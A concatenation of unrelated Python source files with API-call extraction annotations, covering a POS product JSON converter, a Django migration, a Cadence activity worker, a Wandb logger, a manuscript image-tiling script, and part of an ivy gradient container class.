] | [((3411, 3438), 'random.shuffle', 'random.shuffle', (['self.DELTA8'], {}), '(self.DELTA8)\n', (3425, 3438), False, 'import random\n'), ((3886, 3913), 'random.shuffle', 'random.shuffle', (['self.DELTA8'], {}), '(self.DELTA8)\n', (3900, 3913), False, 'import random\n'), ((6809, 6834), 'pygame.Rect', 'pygame.Rect', (['(20)', '(20)', '(5)', '(5)'], {}), '(20, 20, 5, 5)\n', (6820, 6834), False, 'import pygame\n'), ((6073, 6163), 'pygame.Rect', 'pygame.Rect', (['(chara.pos[0] - reach)', '(chara.pos[1] - reach)', '(reach * 2 + 1)', '(reach * 2 + 1)'], {}), '(chara.pos[0] - reach, chara.pos[1] - reach, reach * 2 + 1, \n reach * 2 + 1)\n', (6084, 6163), False, 'import pygame\n'), ((6421, 6441), 'random.randint', 'random.randint', (['(1)', '(3)'], {}), '(1, 3)\n', (6435, 6441), False, 'import random\n')] |
import json
import jsonpickle
from pprint import pprint
class Object(object):
pass
prods = Object()
prods.accountId="<KEY>"
prods.locationId="5db938536d49b300017efcc3"
prods.products=[]
prods.categories=[]
with open ('pl.json', 'r') as f:
products_dict = json.load(f)
for item in products_dict["models"]:
prod = Object()
prod.productType=1
prod.plu=item["id"]
prod.price=item["price"]
prod.posProductId=item["id"]
prod.name=item["name"]
prod.posProductCategoryId=item["parentId"]
prod.imageUrl=""
prod.description=item["description"]
prod.deliveryTax=20000
prod.takeawayTax=20000
prods.products.append(prod)
with open ('cat.json', 'r') as f:
category_dict = json.load(f)
for item in category_dict["models"]:
cat = Object()
cat.name=item["name"]
cat.posCategoryId=item["id"]
cat.imageUrl:""
prods.categories.append(cat)
print(jsonpickle.dumps(prods))
| [
"json.load",
"jsonpickle.dumps"
] | [((268, 280), 'json.load', 'json.load', (['f'], {}), '(f)\n', (277, 280), False, 'import json\n'), ((725, 737), 'json.load', 'json.load', (['f'], {}), '(f)\n', (734, 737), False, 'import json\n'), ((915, 938), 'jsonpickle.dumps', 'jsonpickle.dumps', (['prods'], {}), '(prods)\n', (931, 938), False, 'import jsonpickle\n')] |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.1 on 2016-09-18 04:11
from __future__ import unicode_literals
import CareerTinder.listfield
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('CareerTinder', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='hiree',
name='date_of_birth',
),
migrations.RemoveField(
model_name='hiree',
name='name',
),
migrations.AddField(
model_name='hiree',
name='college',
field=models.CharField(default='mit', max_length=100),
preserve_default=False,
),
migrations.AddField(
model_name='hiree',
name='degree',
field=models.CharField(choices=[(b'BA', b"Bachelor's"), (b'MA', b"Master's"), (b'DO', b'Doctorate')], default='ba', max_length=10),
preserve_default=False,
),
migrations.AddField(
model_name='hiree',
name='first_name',
field=models.CharField(default='john', max_length=50),
preserve_default=False,
),
migrations.AddField(
model_name='hiree',
name='last_name',
field=models.CharField(default='doe', max_length=50),
preserve_default=False,
),
migrations.AddField(
model_name='hiree',
name='major',
field=models.CharField(default='cs', max_length=100),
preserve_default=False,
),
migrations.AddField(
model_name='hiree',
name='year',
field=models.IntegerField(default='2019'),
preserve_default=False,
),
migrations.AddField(
model_name='recruiter',
name='hirees',
field=CareerTinder.listfield.ListField(default=b''),
),
migrations.AlterField(
model_name='company',
name='logo',
field=models.ImageField(upload_to=b'media/logos/'),
),
migrations.AlterField(
model_name='hiree',
name='face_picture',
field=models.ImageField(upload_to=b'media/faces/'),
),
migrations.AlterField(
model_name='hiree',
name='resume_picture',
field=models.FileField(upload_to=b'media/resumes/'),
),
]
| [
"django.db.models.IntegerField",
"django.db.models.FileField",
"django.db.models.ImageField",
"django.db.migrations.RemoveField",
"django.db.models.CharField"
] | [((324, 388), 'django.db.migrations.RemoveField', 'migrations.RemoveField', ([], {'model_name': '"""hiree"""', 'name': '"""date_of_birth"""'}), "(model_name='hiree', name='date_of_birth')\n", (346, 388), False, 'from django.db import migrations, models\n'), ((433, 488), 'django.db.migrations.RemoveField', 'migrations.RemoveField', ([], {'model_name': '"""hiree"""', 'name': '"""name"""'}), "(model_name='hiree', name='name')\n", (455, 488), False, 'from django.db import migrations, models\n'), ((632, 679), 'django.db.models.CharField', 'models.CharField', ([], {'default': '"""mit"""', 'max_length': '(100)'}), "(default='mit', max_length=100)\n", (648, 679), False, 'from django.db import migrations, models\n'), ((834, 963), 'django.db.models.CharField', 'models.CharField', ([], {'choices': '[(b\'BA\', b"Bachelor\'s"), (b\'MA\', b"Master\'s"), (b\'DO\', b\'Doctorate\')]', 'default': '"""ba"""', 'max_length': '(10)'}), '(choices=[(b\'BA\', b"Bachelor\'s"), (b\'MA\', b"Master\'s"), (\n b\'DO\', b\'Doctorate\')], default=\'ba\', max_length=10)\n', (850, 963), False, 'from django.db import migrations, models\n'), ((1117, 1164), 'django.db.models.CharField', 'models.CharField', ([], {'default': '"""john"""', 'max_length': '(50)'}), "(default='john', max_length=50)\n", (1133, 1164), False, 'from django.db import migrations, models\n'), ((1322, 1368), 'django.db.models.CharField', 'models.CharField', ([], {'default': '"""doe"""', 'max_length': '(50)'}), "(default='doe', max_length=50)\n", (1338, 1368), False, 'from django.db import migrations, models\n'), ((1522, 1568), 'django.db.models.CharField', 'models.CharField', ([], {'default': '"""cs"""', 'max_length': '(100)'}), "(default='cs', max_length=100)\n", (1538, 1568), False, 'from django.db import migrations, models\n'), ((1721, 1756), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '"""2019"""'}), "(default='2019')\n", (1740, 1756), False, 'from django.db import migrations, models\n'), ((2081, 2125), 'django.db.models.ImageField', 'models.ImageField', ([], {'upload_to': "b'media/logos/'"}), "(upload_to=b'media/logos/')\n", (2098, 2125), False, 'from django.db import migrations, models\n'), ((2252, 2296), 'django.db.models.ImageField', 'models.ImageField', ([], {'upload_to': "b'media/faces/'"}), "(upload_to=b'media/faces/')\n", (2269, 2296), False, 'from django.db import migrations, models\n'), ((2425, 2470), 'django.db.models.FileField', 'models.FileField', ([], {'upload_to': "b'media/resumes/'"}), "(upload_to=b'media/resumes/')\n", (2441, 2470), False, 'from django.db import migrations, models\n')] |
import datetime
import logging
import json
from cadence.activity import ActivityContext
from cadence.cadence_types import PollForActivityTaskRequest, TaskListMetadata, TaskList, PollForActivityTaskResponse, \
RespondActivityTaskCompletedRequest, RespondActivityTaskFailedRequest
from cadence.conversions import json_to_args
from cadence.workflowservice import WorkflowService
from cadence.worker import Worker
logger = logging.getLogger(__name__)
def activity_task_loop(worker: Worker):
service = WorkflowService.create(worker.host, worker.port)
logger.info(f"Activity task worker started: {WorkflowService.get_identity()}")
try:
while True:
if worker.is_stop_requested():
return
try:
polling_start = datetime.datetime.now()
polling_request = PollForActivityTaskRequest()
polling_request.task_list_metadata = TaskListMetadata()
polling_request.task_list_metadata.max_tasks_per_second = 200000
polling_request.domain = worker.domain
polling_request.identity = WorkflowService.get_identity()
polling_request.task_list = TaskList()
polling_request.task_list.name = worker.task_list
task: PollForActivityTaskResponse
task, err = service.poll_for_activity_task(polling_request)
polling_end = datetime.datetime.now()
logger.debug("PollForActivityTask: %dms", (polling_end - polling_start).total_seconds() * 1000)
except Exception as ex:
logger.error("PollForActivityTask error: %s", ex)
continue
if err:
logger.error("PollForActivityTask failed: %s", err)
continue
if not task.task_token:
logger.debug("PollForActivityTask has no task_token (expected): %s", task)
continue
args = json_to_args(task.input)
logger.info(f"Request for activity: {task.activity_type.name}")
fn = worker.activities.get(task.activity_type.name)
if not fn:
logger.error("Activity type not found: " + task.activity_type.name)
continue
process_start = datetime.datetime.now()
activity_context = ActivityContext()
activity_context.task_token = task.task_token
activity_context.workflow_execution = task.workflow_execution
activity_context.domain = worker.domain
try:
ActivityContext.set(activity_context)
ret = fn(*args)
ActivityContext.set(None)
respond = RespondActivityTaskCompletedRequest()
respond.task_token = task.task_token
respond.result = json.dumps(ret)
respond.identity = WorkflowService.get_identity()
_, error = service.respond_activity_task_completed(respond)
if error:
logger.error("Error invoking RespondActivityTaskCompleted: %s", error)
logger.info(f"Activity {task.activity_type.name}({str(args)[1:-1]}) returned {respond.result}")
except Exception as ex:
logger.error(f"Activity {task.activity_type.name} failed: {type(ex).__name__}({ex})", exc_info=1)
respond: RespondActivityTaskFailedRequest = RespondActivityTaskFailedRequest()
respond.task_token = task.task_token
respond.identity = WorkflowService.get_identity()
respond.details = json.dumps({
"detailMessage": f"Python error: {type(ex).__name__}({ex})",
"class": "java.lang.Exception"
})
respond.reason = "java.lang.Exception"
_, error = service.respond_activity_task_failed(respond)
if error:
logger.error("Error invoking RespondActivityTaskFailed: %s", error)
process_end = datetime.datetime.now()
logger.info("Process ActivityTask: %dms", (process_end - process_start).total_seconds() * 1000)
finally:
worker.notify_thread_stopped()
| [
"logging.getLogger",
"cadence.cadence_types.RespondActivityTaskFailedRequest",
"cadence.workflowservice.WorkflowService.create",
"cadence.activity.ActivityContext.set",
"cadence.cadence_types.RespondActivityTaskCompletedRequest",
"cadence.activity.ActivityContext",
"cadence.workflowservice.WorkflowServi... | [((425, 452), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (442, 452), False, 'import logging\n'), ((509, 557), 'cadence.workflowservice.WorkflowService.create', 'WorkflowService.create', (['worker.host', 'worker.port'], {}), '(worker.host, worker.port)\n', (531, 557), False, 'from cadence.workflowservice import WorkflowService\n'), ((1979, 2003), 'cadence.conversions.json_to_args', 'json_to_args', (['task.input'], {}), '(task.input)\n', (1991, 2003), False, 'from cadence.conversions import json_to_args\n'), ((2305, 2328), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (2326, 2328), False, 'import datetime\n'), ((2360, 2377), 'cadence.activity.ActivityContext', 'ActivityContext', ([], {}), '()\n', (2375, 2377), False, 'from cadence.activity import ActivityContext\n'), ((4075, 4098), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (4096, 4098), False, 'import datetime\n'), ((607, 637), 'cadence.workflowservice.WorkflowService.get_identity', 'WorkflowService.get_identity', ([], {}), '()\n', (635, 637), False, 'from cadence.workflowservice import WorkflowService\n'), ((785, 808), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (806, 808), False, 'import datetime\n'), ((843, 871), 'cadence.cadence_types.PollForActivityTaskRequest', 'PollForActivityTaskRequest', ([], {}), '()\n', (869, 871), False, 'from cadence.cadence_types import PollForActivityTaskRequest, TaskListMetadata, TaskList, PollForActivityTaskResponse, RespondActivityTaskCompletedRequest, RespondActivityTaskFailedRequest\n'), ((925, 943), 'cadence.cadence_types.TaskListMetadata', 'TaskListMetadata', ([], {}), '()\n', (941, 943), False, 'from cadence.cadence_types import PollForActivityTaskRequest, TaskListMetadata, TaskList, PollForActivityTaskResponse, RespondActivityTaskCompletedRequest, RespondActivityTaskFailedRequest\n'), ((1123, 1153), 'cadence.workflowservice.WorkflowService.get_identity', 'WorkflowService.get_identity', ([], {}), '()\n', (1151, 1153), False, 'from cadence.workflowservice import WorkflowService\n'), ((1198, 1208), 'cadence.cadence_types.TaskList', 'TaskList', ([], {}), '()\n', (1206, 1208), False, 'from cadence.cadence_types import PollForActivityTaskRequest, TaskListMetadata, TaskList, PollForActivityTaskResponse, RespondActivityTaskCompletedRequest, RespondActivityTaskFailedRequest\n'), ((1431, 1454), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (1452, 1454), False, 'import datetime\n'), ((2595, 2632), 'cadence.activity.ActivityContext.set', 'ActivityContext.set', (['activity_context'], {}), '(activity_context)\n', (2614, 2632), False, 'from cadence.activity import ActivityContext\n'), ((2681, 2706), 'cadence.activity.ActivityContext.set', 'ActivityContext.set', (['None'], {}), '(None)\n', (2700, 2706), False, 'from cadence.activity import ActivityContext\n'), ((2733, 2770), 'cadence.cadence_types.RespondActivityTaskCompletedRequest', 'RespondActivityTaskCompletedRequest', ([], {}), '()\n', (2768, 2770), False, 'from cadence.cadence_types import PollForActivityTaskRequest, TaskListMetadata, TaskList, PollForActivityTaskResponse, RespondActivityTaskCompletedRequest, RespondActivityTaskFailedRequest\n'), ((2857, 2872), 'json.dumps', 'json.dumps', (['ret'], {}), '(ret)\n', (2867, 2872), False, 'import json\n'), ((2908, 2938), 'cadence.workflowservice.WorkflowService.get_identity', 'WorkflowService.get_identity', ([], {}), '()\n', (2936, 2938), False, 'from cadence.workflowservice import WorkflowService\n'), ((3454, 3488), 'cadence.cadence_types.RespondActivityTaskFailedRequest', 'RespondActivityTaskFailedRequest', ([], {}), '()\n', (3486, 3488), False, 'from cadence.cadence_types import PollForActivityTaskRequest, TaskListMetadata, TaskList, PollForActivityTaskResponse, RespondActivityTaskCompletedRequest, RespondActivityTaskFailedRequest\n'), ((3577, 3607), 'cadence.workflowservice.WorkflowService.get_identity', 'WorkflowService.get_identity', ([], {}), '()\n', (3605, 3607), False, 'from cadence.workflowservice import WorkflowService\n')] |
# Copyright 2020 Toyota Research Institute. All rights reserved.
# Adapted from Pytorch-Lightning
# https://github.com/PyTorchLightning/pytorch-lightning/blob/master/pytorch_lightning/loggers/wandb.py
from argparse import Namespace
from collections import OrderedDict
import numpy as np
import torch.nn as nn
import wandb
from wandb.wandb_run import Run
from packnet_sfm.utils.depth import viz_inv_depth
from packnet_sfm.utils.logging import prepare_dataset_prefix
from packnet_sfm.utils.types import is_dict, is_tensor
class WandbLogger:
"""
Wandb logger class to monitor training.
Parameters
----------
name : str
Run name (if empty, uses a fancy Wandb name, highly recommended)
dir : str
Folder where wandb information is stored
id : str
ID for the run
anonymous : bool
Anonymous mode
version : str
Run version
project : str
Wandb project where the run will live
tags : list of str
List of tags to append to the run
log_model : bool
Log the model to wandb or not
experiment : wandb
Wandb experiment
entity : str
Wandb entity
"""
def __init__(self,
name=None, dir=None, id=None, anonymous=False,
version=None, project=None, entity=None,
tags=None, log_model=False, experiment=None
):
super().__init__()
self._name = name
self._dir = dir
self._anonymous = 'allow' if anonymous else None
self._id = version or id
self._tags = tags
self._project = project
self._entity = entity
self._log_model = log_model
self._experiment = experiment if experiment else self.create_experiment()
self._metrics = OrderedDict()
def __getstate__(self):
"""Get the current logger state"""
state = self.__dict__.copy()
state['_id'] = self._experiment.id if self._experiment is not None else None
state['_experiment'] = None
return state
def create_experiment(self):
"""Creates and returns a new experiment"""
experiment = wandb.init(
name=self._name, dir=self._dir, project=self._project,
anonymous=self._anonymous, reinit=True, id=self._id,
resume='allow', tags=self._tags, entity=self._entity
)
wandb.run.save()
return experiment
def watch(self, model: nn.Module, log: str = 'gradients', log_freq: int = 100):
"""Watch training parameters."""
self.experiment.watch(model, log=log, log_freq=log_freq)
@property
def experiment(self) -> Run:
"""Returns the experiment (creates a new if it doesn't exist)."""
if self._experiment is None:
self._experiment = self.create_experiment()
return self._experiment
@property
def version(self) -> str:
"""Returns experiment version."""
return self._experiment.id if self._experiment else None
@property
def name(self) -> str:
"""Returns experiment name."""
name = self._experiment.project_name() if self._experiment else None
return name
@property
def run_name(self) -> str:
"""Returns run name."""
return wandb.run.name if self._experiment else None
@property
def run_url(self) -> str:
"""Returns run URL."""
return 'https://app.wandb.ai/{}/{}/runs/{}'.format(
wandb.run.entity, wandb.run.project, wandb.run.id) if self._experiment else None
@staticmethod
def _convert_params(params):
if isinstance(params, Namespace):
params = vars(params)
if params is None:
params = {}
return params
def log_config(self, params):
"""Logs model configuration."""
params = self._convert_params(params)
self.experiment.config.update(params, allow_val_change=True)
def log_metrics(self, metrics):
"""Logs training metrics."""
self._metrics.update(metrics)
if 'global_step' in metrics:
self.experiment.log(self._metrics)
self._metrics.clear()
def log_images(self, func, mode, batch, output,
args, dataset, world_size, config):
"""
Adds images to metrics for later logging.
Parameters
----------
func : Function
Function used to process the image before logging
mode : str {"train", "val"}
Training stage where the images come from (serve as prefix for logging)
batch : dict
Data batch
output : dict
Model output
args : tuple
Step arguments
dataset : CfgNode
Dataset configuration
world_size : int
Number of GPUs, used to get logging samples at consistent intervals
config : CfgNode
Model configuration
"""
dataset_idx = 0 if len(args) == 1 else args[1]
prefix = prepare_dataset_prefix(config, dataset_idx)
interval = len(dataset[dataset_idx]) // world_size // config.num_logs
if args[0] % interval == 0:
prefix_idx = '{}-{}-{}'.format(mode, prefix, batch['idx'][0].item())
func(prefix_idx, batch, output)
# Log depth images
def log_depth(self, *args, **kwargs):
"""Helper function used to log images relevant for depth estimation"""
def log(prefix_idx, batch, output):
self._metrics.update(log_rgb('rgb', prefix_idx, batch))
self._metrics.update(log_inv_depth('inv_depth', prefix_idx, output))
if 'depth' in batch:
self._metrics.update(log_depth('depth', prefix_idx, batch))
self.log_images(log, *args, **kwargs)
def log_rgb(key, prefix, batch, i=0):
"""
Converts an RGB image from a batch for logging
Parameters
----------
key : str
Key from data containing the image
prefix : str
Prefix added to the key for logging
batch : dict
Dictionary containing the key
i : int
Batch index from which to get the image
Returns
-------
image : wandb.Image
Wandb image ready for logging
"""
rgb = batch[key] if is_dict(batch) else batch
return prep_image(prefix, key,
rgb[i])
def log_depth(key, prefix, batch, i=0):
"""
Converts a depth map from a batch for logging
Parameters
----------
key : str
Key from data containing the depth map
prefix : str
Prefix added to the key for logging
batch : dict
Dictionary containing the key
i : int
Batch index from which to get the depth map
Returns
-------
image : wandb.Image
Wandb image ready for logging
"""
depth = batch[key] if is_dict(batch) else batch
inv_depth = 1. / depth[i]
inv_depth[depth[i] == 0] = 0
return prep_image(prefix, key,
viz_inv_depth(inv_depth, filter_zeros=True))
def log_inv_depth(key, prefix, batch, i=0):
"""
Converts an inverse depth map from a batch for logging
Parameters
----------
key : str
Key from data containing the inverse depth map
prefix : str
Prefix added to the key for logging
batch : dict
Dictionary containing the key
i : int
Batch index from which to get the inverse depth map
Returns
-------
image : wandb.Image
Wandb image ready for logging
"""
inv_depth = batch[key] if is_dict(batch) else batch
return prep_image(prefix, key,
viz_inv_depth(inv_depth[i]))
def prep_image(prefix, key, image):
"""
Prepare image for wandb logging
Parameters
----------
prefix : str
Prefix added to the key for logging
key : str
Key from data containing the inverse depth map
image : torch.Tensor [3,H,W]
Image to be logged
Returns
-------
output : dict
Dictionary with key and value for logging
"""
if is_tensor(image):
image = image.detach().permute(1, 2, 0).cpu().numpy()
prefix_key = '{}-{}'.format(prefix, key)
return {prefix_key: wandb.Image(image, caption=key)}
| [
"packnet_sfm.utils.logging.prepare_dataset_prefix",
"collections.OrderedDict",
"wandb.Image",
"wandb.init",
"packnet_sfm.utils.types.is_dict",
"wandb.run.save",
"packnet_sfm.utils.depth.viz_inv_depth",
"packnet_sfm.utils.types.is_tensor"
] | [((8142, 8158), 'packnet_sfm.utils.types.is_tensor', 'is_tensor', (['image'], {}), '(image)\n', (8151, 8158), False, 'from packnet_sfm.utils.types import is_dict, is_tensor\n'), ((1803, 1816), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (1814, 1816), False, 'from collections import OrderedDict\n'), ((2174, 2356), 'wandb.init', 'wandb.init', ([], {'name': 'self._name', 'dir': 'self._dir', 'project': 'self._project', 'anonymous': 'self._anonymous', 'reinit': '(True)', 'id': 'self._id', 'resume': '"""allow"""', 'tags': 'self._tags', 'entity': 'self._entity'}), "(name=self._name, dir=self._dir, project=self._project, anonymous\n =self._anonymous, reinit=True, id=self._id, resume='allow', tags=self.\n _tags, entity=self._entity)\n", (2184, 2356), False, 'import wandb\n'), ((2401, 2417), 'wandb.run.save', 'wandb.run.save', ([], {}), '()\n', (2415, 2417), False, 'import wandb\n'), ((5060, 5103), 'packnet_sfm.utils.logging.prepare_dataset_prefix', 'prepare_dataset_prefix', (['config', 'dataset_idx'], {}), '(config, dataset_idx)\n', (5082, 5103), False, 'from packnet_sfm.utils.logging import prepare_dataset_prefix\n'), ((6318, 6332), 'packnet_sfm.utils.types.is_dict', 'is_dict', (['batch'], {}), '(batch)\n', (6325, 6332), False, 'from packnet_sfm.utils.types import is_dict, is_tensor\n'), ((6902, 6916), 'packnet_sfm.utils.types.is_dict', 'is_dict', (['batch'], {}), '(batch)\n', (6909, 6916), False, 'from packnet_sfm.utils.types import is_dict, is_tensor\n'), ((7048, 7091), 'packnet_sfm.utils.depth.viz_inv_depth', 'viz_inv_depth', (['inv_depth'], {'filter_zeros': '(True)'}), '(inv_depth, filter_zeros=True)\n', (7061, 7091), False, 'from packnet_sfm.utils.depth import viz_inv_depth\n'), ((7619, 7633), 'packnet_sfm.utils.types.is_dict', 'is_dict', (['batch'], {}), '(batch)\n', (7626, 7633), False, 'from packnet_sfm.utils.types import is_dict, is_tensor\n'), ((7702, 7729), 'packnet_sfm.utils.depth.viz_inv_depth', 'viz_inv_depth', (['inv_depth[i]'], {}), '(inv_depth[i])\n', (7715, 7729), False, 'from packnet_sfm.utils.depth import viz_inv_depth\n'), ((8291, 8322), 'wandb.Image', 'wandb.Image', (['image'], {'caption': 'key'}), '(image, caption=key)\n', (8302, 8322), False, 'import wandb\n')] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Sep 3 17:20:06 2018
@author: chrispedder
A routine to crop sections from the images of different manuscripts in the two
datasets to the same size, and with the same magnification, so that the average
script size doesn't create a feature that the neural networks can learn.
Reading the data description of the CLaMM dataset, we find that the images
are 150mm*100mm, so we need to take similar-sized crops from our new target
data. Looking at the bar on the left, we find that 6000px =(341-47) = 294mm
So 1mm = 20.41px. We therefore need to crop 3062 * 2041px from the original
However, to not give away too much, we need to make this crop a little
random. Looking at the test images, 1) Their heights vary by around 100px
AFTER downsampling, so around 170px BEFORE downsampling. 2) Their widths
vary by proportionately less, around 65px AFTER, so 110px BEFORE.
We define a crop function below which achieves precisely this.
To run this routine, call something like `python -m src.data.data_processing
--thow_input_path data/raw/MS157/ --thow_output_path data/external/thow_out
--clamm_input_path data/raw/ICDAR2017_CLaMM_Training/
--clamm_output_path data/external/clamm_out`
The four command line args given here are all required.
"""
import numpy as np
import scipy.io
import random
import scipy.ndimage
import glob
import os
import argparse
from PIL import Image
from random import randint
from typing import List
# helper function to clean up file list for scraped THoW filenames
def clean_THoW_file_list(file_list: List):
# clean out folio views etc, whose filenames start with a letter
# rather than a number
cleaned_THoW_list = [element for element in file_list if not
element[-5].isalpha()]
return cleaned_THoW_list
class ImageProcessor(object):
def __init__(self, args):
# Crop images from point CORNER, to size given by DIM
self.CORNER = [1000,1400]
self.DIM = [3062,2041]
# To match the training data, we need to downsample images by a
# factor of 1.7
self.SCALE = 1.7
# Set size of training tiles here (we could pick 224*224 to match the
# expected input size of VGG16 here too)
self.IM_HEIGHT = 300
self.IM_WIDTH = 300
# Set random seed to get the same train-test split when run
self.SEED = 42
random.seed(self.SEED)
self.args = args
def read_raw_from_dir(self, filename):
"""
Define function to read bytes directly from tar by filename.
"""
x = Image.open(filename)
x = x.convert('L')
# makes it greyscale - CLaMM data is already grayscale
y = np.asarray(x.getdata(), dtype='uint8')
return y.reshape((x.size[1], x.size[0]))
def image_oc_crop(self, img):
"""
Makes a crop of an img, with coordinates of the top left corner
top_left_pt and of side lengths "dimensions" using numpy slicing.
"""
lh, lw = self.CORNER
dim_x, dim_y = self.DIM
cropped_img = img[lh:lh+dim_x,lw:lw+dim_y]
return cropped_img
def resample_image(self, img):
"""
Resample scraped images to make them a similar number of pixels to
CLaMM dataset images.
"""
# retain a single image channel, use cubic splines for resampling
resampled = scipy.ndimage.zoom(img, 1/self.SCALE, order=3)
output = resampled.astype('uint8')
return output
def prepare_raw_bytes_for_model(self, input_path):
"""
Put everything together into one function to read, crop & scale data
"""
input_image = self.read_raw_from_dir(input_path)
cropped_input = self.image_oc_crop(input_image)
img = self.resample_image(cropped_input)
return img
def tile_crop(self, array):
"""
function to crop tile_height by tile_width sections from the original
cropped files.
"""
array_height, array_width = array.shape
height_tiles_number = array_height//self.IM_HEIGHT
width_tiles_number = array_width//self.IM_WIDTH
tile_list = []
for i in range(height_tiles_number):
for j in range(width_tiles_number):
new_tile = array[i * self.IM_HEIGHT: (i + 1) * self.IM_HEIGHT,
j * self.IM_WIDTH: (j + 1)* self.IM_WIDTH]
tile_list.append(new_tile)
return tile_list
def write_input_data_to_jpg(self, input_path, output_path, THOW=False):
"""
Read files, process and write out processed files to an external folder,
defined by the argparse args
"""
counter = 0
file_suffix = '*.jpg' if THOW else '*.tif'
file_name = 'THOW' if THOW else 'CLaMM'
# get list of files in the raw data directory
input_files_list = sorted(glob.glob(input_path + file_suffix))
if THOW:
input_files_list = clean_THoW_file_list(input_files_list)
else:
input_files_list = input_files_list[:500]
#check output directory exists, if not create it
if not os.path.exists(output_path):
os.mkdir(output_path)
for element in input_files_list:
image = self.prepare_raw_bytes_for_model(element)
new_tile_list = self.tile_crop(image)
for i, tile in enumerate(new_tile_list):
# define file names for training example
tile_file_name = os.path.join(
output_path,
file_name + str(counter + i) + ".jpg")
# write three copies of the grayscale image to three separate
# layers as the VGG16 net expects an RGB input
tensorized = np.dstack([tile] * 3)
# create image from tensorized array
im = Image.fromarray(tensorized)
# save to path specified in arguments
im.save(tile_file_name)
print(
"Tile with name {} written to disk".format(tile_file_name))
counter += len(new_tile_list)
print("So far {} files written".format(counter))
print("File writing completed")
def process_all_files(self):
print(f'Reading data from {self.args.thow_input_path}, writing to\
{self.args.thow_output_path}')
self.write_input_data_to_jpg(self.args.thow_input_path,
self.args.thow_output_path,
THOW=True)
print(f'Reading data from {self.args.clamm_input_path}, writing to\
{self.args.clamm_output_path}')
self.write_input_data_to_jpg(self.args.clamm_input_path,
self.args.clamm_output_path)
print('All files processed and written to file')
def parse_args():
parser = argparse.ArgumentParser(description='Command line options for '
'processing the data files needed to train the model.')
parser.add_argument('--thow_input_path', type=str, required=True,
help='give the path to the THOW raw files')
parser.add_argument('--thow_output_path', type=str, required=True,
help='path to where we should write the processed THOW tile files')
parser.add_argument('--clamm_input_path', type=str, required=True,
help='give the path to the CLaMM raw files')
parser.add_argument('--clamm_output_path', type=str, required=True,
help='path to where we should write the processed CLaMM tile files')
args = parser.parse_args()
return args
if __name__ == '__main__':
args = parse_args()
processor = ImageProcessor(args)
processor.process_all_files()
| [
"os.path.exists",
"numpy.dstack",
"PIL.Image.open",
"PIL.Image.fromarray",
"argparse.ArgumentParser",
"random.seed",
"os.mkdir",
"glob.glob"
] | [((7029, 7155), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Command line options for processing the data files needed to train the model."""'}), "(description=\n 'Command line options for processing the data files needed to train the model.'\n )\n", (7052, 7155), False, 'import argparse\n'), ((2434, 2456), 'random.seed', 'random.seed', (['self.SEED'], {}), '(self.SEED)\n', (2445, 2456), False, 'import random\n'), ((2632, 2652), 'PIL.Image.open', 'Image.open', (['filename'], {}), '(filename)\n', (2642, 2652), False, 'from PIL import Image\n'), ((4987, 5022), 'glob.glob', 'glob.glob', (['(input_path + file_suffix)'], {}), '(input_path + file_suffix)\n', (4996, 5022), False, 'import glob\n'), ((5252, 5279), 'os.path.exists', 'os.path.exists', (['output_path'], {}), '(output_path)\n', (5266, 5279), False, 'import os\n'), ((5297, 5318), 'os.mkdir', 'os.mkdir', (['output_path'], {}), '(output_path)\n', (5305, 5318), False, 'import os\n'), ((5893, 5914), 'numpy.dstack', 'np.dstack', (['([tile] * 3)'], {}), '([tile] * 3)\n', (5902, 5914), True, 'import numpy as np\n'), ((5989, 6016), 'PIL.Image.fromarray', 'Image.fromarray', (['tensorized'], {}), '(tensorized)\n', (6004, 6016), False, 'from PIL import Image\n')] |
from typing import Optional, Union, List, Dict
# local
import ivy
from ivy.container.base import ContainerBase
# noinspection PyMissingConstructor
class ContainerWithGradients(ContainerBase):
@staticmethod
def static_optimizer_update(
w,
effective_grad,
lr,
inplace=None,
stop_gradients=True,
key_chains: Optional[Union[List[str], Dict[str, str]]] = None,
to_apply: bool = True,
prune_unapplied: bool = False,
map_sequences: bool = False,
) -> ivy.Container:
return ContainerBase.multi_map_in_static_method(
"optimizer_update",
w,
effective_grad,
lr,
inplace=inplace,
stop_gradients=stop_gradients,
key_chains=key_chains,
to_apply=to_apply,
prune_unapplied=prune_unapplied,
map_sequences=map_sequences,
)
def optimizer_update(
self: ivy.Container,
effective_grad,
lr,
inplace=None,
stop_gradients=True,
key_chains: Optional[Union[List[str], Dict[str, str]]] = None,
to_apply: bool = True,
prune_unapplied: bool = False,
map_sequences: bool = False,
) -> ivy.Container:
return self.static_optimizer_update(
self,
effective_grad,
lr,
inplace,
stop_gradients,
key_chains,
to_apply,
prune_unapplied,
map_sequences,
)
@staticmethod
def static_gradient_descent_update(
w,
dcdw,
lr,
inplace=None,
stop_gradients=True,
key_chains: Optional[Union[List[str], Dict[str, str]]] = None,
to_apply: bool = True,
prune_unapplied: bool = False,
map_sequences: bool = False,
) -> ivy.Container:
return ContainerBase.multi_map_in_static_method(
"gradient_descent_update",
w,
dcdw,
lr,
inplace=inplace,
stop_gradients=stop_gradients,
key_chains=key_chains,
to_apply=to_apply,
prune_unapplied=prune_unapplied,
map_sequences=map_sequences,
)
def gradient_descent_update(
self,
dcdw,
lr,
inplace=None,
stop_gradients=True,
key_chains: Optional[Union[List[str], Dict[str, str]]] = None,
to_apply: bool = True,
prune_unapplied: bool = False,
map_sequences: bool = False,
):
return self.static_gradient_descent_update(
self,
dcdw,
lr,
inplace,
stop_gradients,
key_chains,
to_apply,
prune_unapplied,
map_sequences,
)
@staticmethod
def static_lars_update(
w,
dcdw,
lr,
decay_lambda=0,
inplace=None,
stop_gradients=True,
key_chains: Optional[Union[List[str], Dict[str, str]]] = None,
to_apply: bool = True,
prune_unapplied: bool = False,
map_sequences: bool = False,
) -> ivy.Container:
return ContainerBase.multi_map_in_static_method(
"lars_update",
w,
dcdw,
lr,
decay_lambda=decay_lambda,
inplace=inplace,
